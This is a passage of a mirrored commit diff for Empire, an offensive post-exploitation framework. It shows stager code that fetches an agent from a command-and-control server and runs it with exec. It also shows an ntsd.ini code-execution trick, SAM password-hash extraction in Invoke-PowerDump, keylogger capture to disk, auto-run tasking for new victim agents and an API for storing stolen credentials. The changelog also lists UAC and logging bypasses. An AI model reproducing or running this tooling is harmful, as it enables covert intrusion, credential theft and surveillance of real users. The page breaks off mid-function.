infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge with Dev

php_fix
xorrior 2017-11-02 23:06:20 -04:00
parent 407df37c60 97b1e24114
commit 642d63d17d
238 changed files with 1871 additions and 713 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
changelog
View File

@ -1,25 +1,26 @@
Running
10/12/2017
--------
- Update crontab to work hourly #667
- Update keylogger to log to disk on server side by @clr2of8
- Fix macro launcher #681
- Fixes vbscript string literal quoting. #702
- Add option to host a stager payload in the http listener @424f424f
- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f
- Hide true host name when using domain fronting #730 @clr2of8
- Fixed custom proxy config in launcher code #728 @dirkjanm
- generate_upload function added to Stagers #722 @hightopfade
- Aes kerberoast #725 @elitest
- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
- Version 2.2 Master Release
- Update crontab to work hourly #667
- Update keylogger to log to disk on server side by @clr2of8
- Fix macro launcher #681
- Fixes vbscript string literal quoting. #702
- Add option to host a stager payload in the http listener @424f424f
- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f
- Hide true host name when using domain fronting #730 @clr2of8
- Fixed custom proxy config in launcher code #728 @dirkjanm
- generate_upload function added to Stagers #722 @hightopfade
- Aes kerberoast #725 @elitest
- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
8/28/2017
--------

3
data/agent/agent.py
View File

@ -137,6 +137,9 @@ def build_response_packet(taskingID, packetData, resultID=0):
if packetData:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8',errors='ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:

37
data/agent/stagers/dropbox.py
View File

@ -247,11 +247,8 @@ except Exception:
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
@ -259,11 +256,7 @@ def strip_PKCS7_padding(data):
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
return data[:-pad]
class AES(object):
'''Encapsulates the AES block cipher.
@ -522,10 +515,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation):
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
# First we padd the plaintext
paddedPlaintext = append_PKCS7_padding(plaintext)
# The we break the padded plaintext in 16 byte chunks
blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)]
# Finally we encypt each block
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
@ -535,15 +531,16 @@ def CBCenc(aesObj, plaintext, base64=False):
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
# First we break the cyphertext in 16 byte chunks
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
# Then we decrypt each block
paddedPlaintext = ""
for block in blocks:
paddedPlaintext += aesObj.decrypt(block)
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
# Finally we strip the padding
plaintext = strip_PKCS7_padding(paddedPlaintext)
return plaintext
@ -892,4 +889,4 @@ response = post_message("https://api.dropboxapi.com/2/files/delete",data=datastr
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, raw)
exec(agent)
exec(agent)

58
data/agent/stagers/http.py
View File

@ -18,6 +18,8 @@ import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
@ -249,13 +251,9 @@ except Exception:
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
@ -263,11 +261,7 @@ def strip_PKCS7_padding(data):
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
return data[:-pad]
class AES(object):
@ -335,10 +329,10 @@ class AES(object):
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
@ -352,9 +346,9 @@ class AES(object):
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
@ -372,9 +366,9 @@ class AES(object):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
@ -528,10 +522,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation):
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
# First we padd the plaintext
paddedPlaintext = append_PKCS7_padding(plaintext)
# The we break the padded plaintext in 16 byte chunks
blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)]
# Finally we encypt each block
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
@ -541,15 +538,16 @@ def CBCenc(aesObj, plaintext, base64=False):
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
# First we break the cyphertext in 16 byte chunks
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
# Then we decrypt each block
paddedPlaintext = ""
for block in blocks:
paddedPlaintext += aesObj.decrypt(block)
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
# Finally we strip the padding
plaintext = strip_PKCS7_padding(paddedPlaintext)
return plaintext

8
data/module_source/code_execution/Invoke-Ntsd.ps1 Normal file
View File

@ -0,0 +1,8 @@
Function Write-Ini([string]$path, [string]$launcher)
{
# -Encoding ASCII is needed otherwise it will write in unicode
# this will cause ntsd to not execute our code
".shell" | Out-File -Encoding ASCII "$path\ntsd.ini"
"$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append
}

BIN
data/module_source/code_execution/ntsd_x64.exe Normal file
View File

Binary file not shown.

BIN
data/module_source/code_execution/ntsd_x86.exe Normal file
View File

Binary file not shown.

BIN
data/module_source/code_execution/ntsdexts_x64.dll Normal file
View File

Binary file not shown.

BIN
data/module_source/code_execution/ntsdexts_x86.dll Normal file
View File

Binary file not shown.

22
data/module_source/credentials/Invoke-PowerDump.ps1
View File

@ -411,14 +411,30 @@ namespace PowerDump
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
if ($u.HashOffset + 0x28 -lt $u.V.Length)
# check if hashes exist (if byte memory equals to 20, then we've got a hash)
$LM_exists = $false;
$NT_exists = $false;
# LM header check
if ($u.V[0xa0..0xa3] -eq 20)
{
$LM_exists = $true;
}
# NT header check
elseif ($u.V[0xac..0xaf] -eq 20)
{
$NT_exists = $true;
}
if ($LM_exists -eq $true)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
elseif ($NT_exists -eq $true)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
@ -494,4 +510,4 @@ namespace PowerDump
{
Write-Error "Administrator or System privileges necessary."
}
}
}

100
empire
View File

@ -10,8 +10,7 @@ from Crypto.Random import random
import ssl
# Empire imports
from lib.common import empire
from lib.common import helpers
from lib.common import empire, helpers
global serverExitCommand
serverExitCommand = 'restart'
@ -134,6 +133,7 @@ def get_permanent_token(conn):
# GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted
#
# GET http://localhost:1337/api/creds return stored credentials
# POST http://localhost:1337/api/creds add creds to the database
#
# GET http://localhost:1337/api/admin/login retrieve the API token given the correct username and password
# GET http://localhost:1337/api/admin/permanenttoken retrieve the permanent API token, generating/storing one if it doesn't already exist
@ -1039,6 +1039,67 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
return jsonify({'creds' : creds})
@app.route('/api/creds', methods=['POST'])
def add_creds():
"""
Adds credentials to the database
"""
if not request.json:
return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
if not 'credentials' in request.json:
return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400)
creds = request.json['credentials']
if not type(creds) == list:
return make_response(jsonify({'error':'credentials must be provided as a list'}), 400)
required_fields = ["credtype", "domain", "username", "password", "host"]
optional_fields = ["OS", "notes", "sid"]
for cred in creds:
# ensure every credential given to us has all the required fields
if not all (k in cred for k in required_fields):
return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400)
# ensure the type is either "hash" or "plaintext"
if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'):
return make_response(jsonify({'error':'invalid credential type in %s, must be "hash" or "plaintext"' %(cred)}), 400)
# other than that... just assume everything is valid
# this would be way faster if batched but will work for now
for cred in creds:
# get the optional stuff, if it's there
try:
os = cred['os']
except KeyError:
os = ''
try:
sid = cred['sid']
except KeyError:
sid = ''
try:
notes = cred['notes']
except KeyError:
notes = ''
main.credentials.add_credential(
cred['credtype'],
cred['domain'],
cred['username'],
cred['password'],
cred['host'],
os,
sid,
notes
)
return jsonify({'success': '%s credentials added' % len(creds)})
@app.route('/api/reporting', methods=['GET'])
def get_reporting():
@ -1161,7 +1222,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
if not os.path.exists('./data/empire-chain.pem'):
print "[!] Error: cannot find certificate ./data/empire.pem"
print "[!] Error: cannot find certificate ./data/empire-chain.pem"
sys.exit()
@ -1227,7 +1288,17 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
# wrap the Flask connection in SSL and start it
certPath = os.path.abspath("./data/")
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True)
@ -1239,6 +1310,7 @@ if __name__ == '__main__':
generalGroup = parser.add_argument_group('General Options')
generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
cliGroup = parser.add_argument_group('CLI Payload Options')
cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.')
@ -1267,11 +1339,11 @@ if __name__ == '__main__':
# start an Empire instance and RESTful API
main = empire.MainMenu(args=args)
def thread_api(empireMenu):
while serverExitCommand == 'restart':
try:
start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
try:
start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
thread = helpers.KThread(target=thread_api, args=(main,))
thread.daemon = True
@ -1282,11 +1354,11 @@ if __name__ == '__main__':
elif args.headless:
# start an Empire instance and RESTful API and suppress output
main = empire.MainMenu(args=args)
while serverExitCommand == 'restart':
try:
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
try:
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
else:
# normal execution

36
lib/common/agents.py
View File

@ -1343,6 +1343,20 @@ class Agents:
if autorun and autorun[0] != '' and autorun[1] != '':
self.add_agent_task_db(sessionID, autorun[0], autorun[1])
if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
autorunCmds = ["interact %s" % sessionID]
autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
autorunCmds.extend(["lastautoruncmd"])
self.mainMenu.resourceQueue.extend(autorunCmds)
try:
#this will cause the cmdloop() to start processing the autoruns
self.mainMenu.do_agents("kickit")
except Exception as e:
if e.message == "endautorun":
pass
else:
raise e
return "STAGE2: %s" % (sessionID)
else:
@ -1399,7 +1413,6 @@ class Agents:
TODO: does this need self.lock?
"""
if sessionID not in self.agents:
dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents')
return None
@ -1417,6 +1430,7 @@ class Agents:
# build tasking packets for everything we have
for tasking in taskings:
task_name, task_data, res_id = tasking
all_task_packets += packets.build_task_packet(task_name, task_data, res_id)
# get the session key for the agent
@ -1495,6 +1509,7 @@ class Agents:
"""
agentSessionID = sessionID
keyLogTaskID = None
# see if we were passed a name instead of an ID
nameid = self.get_agent_id_db(sessionID)
@ -1519,6 +1534,10 @@ class Agents:
pk = (pk + 1) % 65536
cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data))
else:
try:
keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0]
except Exception as e:
pass
cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID])
finally:
@ -1703,9 +1722,20 @@ class Agents:
elif responseName == "TASK_CMD_JOB":
#check if this is the powershell keylogging task, if so, write output to file instead of screen
if keyLogTaskID and keyLogTaskID == taskID:
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
if not os.path.abspath(savePath).startswith(safePath):
dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
return
with open(savePath,"a+") as f:
new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
# dynamic script output -> non-blocking
self.update_agent_results_db(sessionID, data)
# dynamic script output -> non-blocking
self.update_agent_results_db(sessionID, data)
# update the agent log
self.save_agent_log(sessionID, data)

516
lib/common/empire.py
View File

@ -95,12 +95,14 @@ class MainMenu(cmd.Cmd):
self.stagers = stagers.Stagers(self, args=args)
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.resourceQueue = []
#A hashtable of autruns based on agent language
self.autoRuns = {}
self.handle_args()
dispatcher.send('[*] Empire starting up...', sender="Empire")
# print the loading menu
messages.loading()
@ -139,6 +141,9 @@ class MainMenu(cmd.Cmd):
"""
Handle any passed arguments.
"""
if self.args.resource:
resourceFile = self.args.resource[0]
self.do_resource(resourceFile)
if self.args.listener or self.args.stager:
# if we're displaying listeners/stagers or generating a stager
@ -232,11 +237,6 @@ class MainMenu(cmd.Cmd):
print helpers.color("[!] Please run database_setup.py")
sys.exit()
# def preloop(self):
# traceback.print_stack()
def cmdloop(self):
"""
The main cmdloop logic that handles navigation to other menus.
@ -274,6 +274,9 @@ class MainMenu(cmd.Cmd):
print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n"
print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n"
if len(self.resourceQueue) > 0:
self.cmdqueue.append(self.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
@ -380,10 +383,43 @@ class MainMenu(cmd.Cmd):
# CMD methods
###################################################
def postcmd(self, stop, line):
if len(self.resourceQueue) > 0:
nextcmd = self.resourceQueue.pop(0)
self.cmdqueue.append(nextcmd)
def default(self, line):
"Default handler."
pass
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.resourceQueue.extend(self.buildQueue(arg))
def buildQueue(self, resourceFile, autoRun=False):
cmds = []
if os.path.isfile(resourceFile):
with open(resourceFile, 'r') as f:
lines = []
lines.extend(f.read().splitlines())
else:
raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
for lineFull in lines:
line = lineFull.strip()
#ignore lines that start with the comment symbol (#)
if line.startswith("#"):
continue
#read in another resource file
elif line.startswith("resource "):
rf = line.split(' ')[1]
cmds.extend(self.buildQueue(rf, autoRun))
#add noprompt option to execute without user confirmation
elif autoRun and line == "execute":
cmds.append(line + " noprompt")
else:
cmds.append(line)
return cmds
def do_exit(self, line):
"Exit Empire"
@ -430,7 +466,6 @@ class MainMenu(cmd.Cmd):
stager_menu.cmdloop()
else:
print helpers.color("[!] Error in MainMenu's do_userstager()")
except Exception as e:
raise e
@ -706,7 +741,6 @@ class MainMenu(cmd.Cmd):
name = line.strip()
sessionID = self.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.agents.agents:
AgentMenu(self, sessionID)
else:
@ -889,26 +923,59 @@ class MainMenu(cmd.Cmd):
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
class AgentsMenu(cmd.Cmd):
"""
The main class used by Empire to drive the 'agents' menu.
"""
class SubMenu(cmd.Cmd):
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
self.doc_header = 'Commands'
def cmdloop(self):
if len(self.mainMenu.resourceQueue) > 0:
self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
def emptyline(self):
pass
messages.display_agents(self.mainMenu.agents.get_agents_db())
# def preloop(self):
# traceback.print_stack()
def postcmd(self, stop, line):
if line == "back":
return True
if len(self.mainMenu.resourceQueue) > 0:
nextcmd = self.mainMenu.resourceQueue.pop(0)
if nextcmd == "lastautoruncmd":
raise Exception("endautorun")
self.cmdqueue.append(nextcmd)
def do_back(self, line):
"Go back a menu."
return True
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_agents(self, line):
"Jump to the agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg))
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
@ -921,29 +988,63 @@ class AgentsMenu(cmd.Cmd):
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
# def preloop(self):
# traceback.print_stack()
def emptyline(self):
pass
class AgentsMenu(SubMenu):
"""
The main class used by Empire to drive the 'agents' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
messages.display_agents(self.mainMenu.agents.get_agents_db())
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_autorun(self, line):
"Read and execute a list of Empire commands from a file and execute on each new agent \"autorun <resource file> <agent language>\" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\""
line = line.strip()
if not line:
print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'")
return
cmds = line.split(' ')
resourceFile = cmds[0]
language = None
if len(cmds) > 1:
language = cmds[1].lower()
elif not resourceFile == "show" and not resourceFile == "clear":
print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'")
return
#show the current autorun settings by language or all
if resourceFile == "show":
if language:
if self.mainMenu.autoRuns.has_key(language):
print self.mainMenu.autoRuns[language]
else:
print "No autorun commands for language %s" % language
else:
print self.mainMenu.autoRuns
#clear autorun settings by language or all
elif resourceFile == "clear":
if language and not language == "all":
if self.mainMenu.autoRuns.has_key(language):
self.mainMenu.autoRuns.pop(language)
else:
print "No autorun commands for language %s" % language
else:
#clear all autoruns
self.mainMenu.autoRuns.clear()
#read in empire commands from the specified resource file
else:
self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)
def do_list(self, line):
@ -956,7 +1057,6 @@ class AgentsMenu(cmd.Cmd):
else:
self.mainMenu.do_list("agents " + str(line))
def do_rename(self, line):
"Rename a particular agent."
@ -1013,12 +1113,6 @@ class AgentsMenu(cmd.Cmd):
except KeyboardInterrupt:
print ''
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def do_clear(self, line):
"Clear one or more agent's taskings."
@ -1412,7 +1506,7 @@ class AgentsMenu(cmd.Cmd):
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class AgentMenu(cmd.Cmd):
class AgentMenu(SubMenu):
"""
An abstracted class used by Empire to determine which agent menu type
to instantiate.
@ -1421,25 +1515,24 @@ class AgentMenu(cmd.Cmd):
agentLanguage = mainMenu.agents.get_language_db(sessionID)
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print helpers.color("[!] Agent language %s not recognized." % (agentLanguage))
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print helpers.color("[!] Agent language %s not recognized." % (agentLanguage))
class PowerShellAgentMenu(cmd.Cmd):
class PowerShellAgentMenu(SubMenu):
"""
The main class used by Empire to drive an individual 'agent' menu.
"""
def __init__(self, mainMenu, sessionID):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.mainMenu = mainMenu
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
@ -1461,7 +1554,6 @@ class PowerShellAgentMenu(cmd.Cmd):
# listen for messages from this specific agent
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# def preloop(self):
# traceback.print_stack()
@ -1469,49 +1561,22 @@ class PowerShellAgentMenu(cmd.Cmd):
"""
Handle agent event signals.
"""
if '[!] Agent' in signal and 'exiting' in signal:
pass
name = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal):
# display any results returned by this agent that are returned
# while we are interacting with it
# while we are interacting with it, unless they are from the powershell keylogger
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results):
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID)
if not os.path.abspath(savePath).startswith(safePath):
dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
return
with open(savePath,"a+") as f:
new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
print "\n" + results
if results and not sender == "AgentsPsKeyLogger":
print "\n" + results
elif "[+] Part of file" in signal and "saved" in signal:
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def default(self, line):
"Default handler"
@ -1531,27 +1596,6 @@ class PowerShellAgentMenu(cmd.Cmd):
print helpers.color("[!] Command not recognized.")
print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
@ -1559,8 +1603,7 @@ class PowerShellAgentMenu(cmd.Cmd):
print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n")
print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n"
else:
cmd.Cmd.do_help(self, *args)
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -1572,7 +1615,6 @@ class PowerShellAgentMenu(cmd.Cmd):
else:
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_rename(self, line):
"Rename the agent."
@ -1588,7 +1630,6 @@ class PowerShellAgentMenu(cmd.Cmd):
else:
print helpers.color("[!] Please enter a new name for the agent")
def do_info(self, line):
"Display information about this agent"
@ -1596,7 +1637,6 @@ class PowerShellAgentMenu(cmd.Cmd):
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
@ -1709,7 +1749,6 @@ class PowerShellAgentMenu(cmd.Cmd):
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command)
# update the agent log
msg = "Tasked agent to kill process: " + str(process)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
@ -2285,13 +2324,11 @@ class PowerShellAgentMenu(cmd.Cmd):
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class PythonAgentMenu(cmd.Cmd):
class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
@ -2312,9 +2349,6 @@ class PythonAgentMenu(cmd.Cmd):
if results:
print "\n" + results.rstrip('\r\n')
# def preloop(self):
# traceback.print_stack()
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals.
@ -2334,51 +2368,13 @@ class PythonAgentMenu(cmd.Cmd):
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n" % str(header))
if self.ruler:
